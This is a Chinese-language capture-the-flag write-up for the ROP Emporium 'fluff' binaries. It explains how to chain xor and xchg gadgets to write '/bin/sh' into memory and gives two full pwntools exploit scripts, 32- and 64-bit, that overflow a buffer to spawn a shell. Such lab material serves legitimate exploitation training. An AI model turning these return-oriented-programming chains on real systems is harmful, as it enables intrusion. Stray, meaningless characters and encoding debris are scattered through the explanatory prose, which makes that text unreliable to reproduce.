ropemporium上的鏈接
https://ropemporium.com/
32位
checksec fluff32然后運(yùn)行./fluff32
放入ida与纽,有system嘹叫,無/bin/sh
看一下gadget
ROPgadget --binary fluff32 --only "mov|pop|ret|xor"
找得不夠循捺,命令改為
ROPgadget --binary fluff32 --only "mov|pop|ret|xor|xchg"
交換指令XCHG是兩個(gè)寄存器诊霹,寄存器和內(nèi)存變量之間內(nèi)容的交換指令
現(xiàn)在就非常巧妙了,曲線救國就是這樣,先逆向思考懂酱,我們想把edx這個(gè)內(nèi)容寫入ecx這個(gè)地址里,沒有pop ecx誊抛,也沒有pop edx列牺,但是有一個(gè)xchg edx,ecx,所以我們只要想辦法得到其中一個(gè)就行拗窃,一個(gè)數(shù)異或自身為0瞎领,任何數(shù)異或0都是它本身,所以xor edx,edx就清空了edx随夸,xor edx,ebx就把ebx寫進(jìn)了edx九默,我們又能找到pop ebx,那么就能寫進(jìn)去了宾毒。
那么正向順序就是:
一驼修、pop ecx:
pop ebx
xor edx,edx
xor edx,ebx
xchg edx,ecx
二、pop edx:
pop ebx
xor edx,edx
xor edx,ebx
三诈铛、mov_edx_to_ecx
找了這幾條命令
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
腳本為
#coding=utf8
from pwn import *
#context.log_level = 'debug'
elf = ELF('./fluff32')
p = process('./fluff32')
pop_ebx = 0x080483e1
xor_edx_edx = 0x08048671
xor_edx_ebx = 0x0804867b
mov_edx_to_ecx = 0x08048693
xchg_edx_ecx = 0x08048689
system_plt = elf.plt['system']
bss = elf.bss()
payload = ''
payload += 'A'*0x28
payload += p32(0)
#bss地址寫入ecx中去
payload += p32(pop_ebx)
payload += p32(bss)
payload += p32(xor_edx_edx)+p32(0)
payload += p32(xor_edx_ebx)+p32(0)
payload += p32(xchg_edx_ecx)+p32(0)
#"/bin"寫入edx,再把edx的內(nèi)容寫入ecx
payload += p32(pop_ebx)
payload += "/bin"
payload += p32(xor_edx_edx)+p32(0)
payload += p32(xor_edx_ebx)+p32(0)
payload += p32(mov_edx_to_ecx)+p32(0)+p32(0)
#bss地址寫入bss+4
payload += p32(pop_ebx)
payload += p32(bss+4)
payload += p32(xor_edx_edx)+p32(0)
payload += p32(xor_edx_ebx)+p32(0)
payload += p32(xchg_edx_ecx)+p32(0)
#"/sh\x00"寫入edx,再把edx的內(nèi)容寫入ecx
payload += p32(pop_ebx)
payload += "/sh\x00"
payload += p32(xor_edx_edx)+p32(0)
payload += p32(xor_edx_ebx)+p32(0)
payload += p32(mov_edx_to_ecx)+p32(0)+p32(0)
payload += p32(system_plt)
payload += p32(0xdeadbeef)
payload += p32(bss)
p.sendline(payload)
p.interactive()
64位
這里需要注意一下在查gadget的時(shí)候乙各,可能會(huì)出現(xiàn)找不到想要的gadget,可以加上參數(shù) --depth 20癌瘾,(20是深度最深的情況了)
ROPgadget --binary fluff --only "pop|mov|ret|xor|xchg" --depth 20
思考過程:我們想把r11這個(gè)內(nèi)容寫入r10這個(gè)地址里觅丰,沒有pop r11,也沒有pop r10妨退,但是有一個(gè)xchg r11,r10妇萄,所以我們只要想辦法得到其中一個(gè)就行,xor r11,r11就清空了r11咬荷,xor r11,r12就把r12寫進(jìn)了r11冠句,我們又能找到pop r12,就能寫進(jìn)去了幸乒。
正向順序就是:
一懦底、pop r10:
pop r12
xor r11,r11
xor r11,r12
xchg r11, r10
二、pop r11:
pop r12
xor r11,r11
xor r11,r12
三罕扎、mov_r11_to_r10
用了這幾條命令:
0x000000000040084e : mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x00000000004008c3 : pop rdi ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
腳本:
#coding=utf8
from pwn import *
#context.log_level = 'debug'
elf = ELF('./fluff')
p = process('./fluff')
pop_r12 = 0x00400832
xor_r11_r11 = 0x00400822
xor_r11_r12 = 0x0040082f
xchg_r11_r10 = 0x00400840
mov_r11_to_r10 = 0x0040084e
pop_rdi = 0x004008c3
system_plt = elf.plt['system']
bss = elf.bss()
payload = ''
payload += 'A'*0x20
payload += p64(0)
#bss地址寫入r10中去
payload += p64(pop_r12)
payload += p64(bss)
payload += p64(xor_r11_r11)+p64(0)
payload += p64(xor_r11_r12)+p64(0)
payload += p64(xchg_r11_r10)+p64(0)
#"/bin/sh\x00"寫入r11,再把r11的內(nèi)容寫入r10
payload += p64(pop_r12)
payload += '/bin/sh\x00'
payload += p64(xor_r11_r11)+p64(0)
payload += p64(xor_r11_r12)+p64(0)
payload += p64(mov_r11_to_r10)+p64(0)+p64(0)
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(system_plt)
p.sendline(payload)
p.interactive()
以上兩個(gè)的flag為ROPE{a_placeholder_32byte_flag!}
ps:據(jù)我的不完全歸納聚唐,ROPgadget前面是我們用到的,即使我們不用到后面腔召,若后面出現(xiàn)pop的杆查,出現(xiàn)幾次就填入幾個(gè)p32(0)或p64(0),也看到有人里面是01234567···的
